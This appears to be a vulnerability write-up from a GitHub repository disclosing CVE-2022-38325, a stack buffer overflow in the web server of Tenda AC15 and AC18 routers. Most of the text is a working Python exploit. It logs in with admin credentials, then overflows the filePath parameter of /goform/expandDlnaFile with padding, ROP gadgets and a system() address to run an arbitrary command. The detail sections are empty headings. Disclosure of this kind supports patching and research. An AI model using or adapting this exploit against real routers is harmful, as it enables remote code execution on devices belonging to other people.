CVE-2022-38325: Vuls/Vul_expandDlnaFile.md at main · 1160300418/Vuls

Vendor of the products:　Tenda

Reported by: 　　　　　 [email protected]

Affected products:　　　AC15 V15.03.05.19_multi, AC18 V15.03.05.19_multi

Overview

An issue was discovered on Tenda AC15 V15.03.05.19_multi and AC18 V15.03.05.19_multi devices. There is a buffer overflow vulnerability in the router’s web server – httpd. While processing the /goform/expandDlnaFile filePath parameter for a post request, the value is directly used in a sprintf function and passed to a local variable placed on the stack, which can override the return address of the function. The attackers can construct a payload to carry out arbitrary code attacks.

Exp

import requests from urllib import parse from pwn import *

main_url = “http://127.0.0.1:80”

def login_success(): global password url = main_url + “/login/Auth” s = requests.Session() s.verify = False headers = {’Content-Type’: 'application/x-www-form-urlencoded; charset=UTF-8’} data = {"username": "admin", "password": "ce80adc6ed1ab2b7f2c85b5fdcd8babc"} data = parse.urlencode(data)

response \= requests.post(url\=url, headers\=headers, data\=data, allow\_redirects\=False)
password \= response.cookies.get\_dict().get("password")
print(response)
if password is None:
    login\_success()
else:
    print(password)

def poc(): url = main_url + “/goform/expandDlnaFile”

cmd \= b'echo yab....'
libc\_base \= 0x40202000
system\_offset \= 0x0005a270
system\_addr \= libc\_base + system\_offset
gadget1 \= libc\_base + 0x00018298
gadget2 \= libc\_base + 0x00040cb8

headers \= {'Cookie': 'password=' + password}
data \= b'filePath='+ b'A' \* (1074) + p32(gadget1) + p32(system\_addr) + p32(gadget2) + cmd
data \= data.decode('latin1')
print(len(data))
response \= requests.post(url\=url, headers\=headers, data\=data, allow\_redirects\=False)
print(response)

if __name__ == "__main__": login_success() poc()

Vul Details****Code in httpd

Attack effect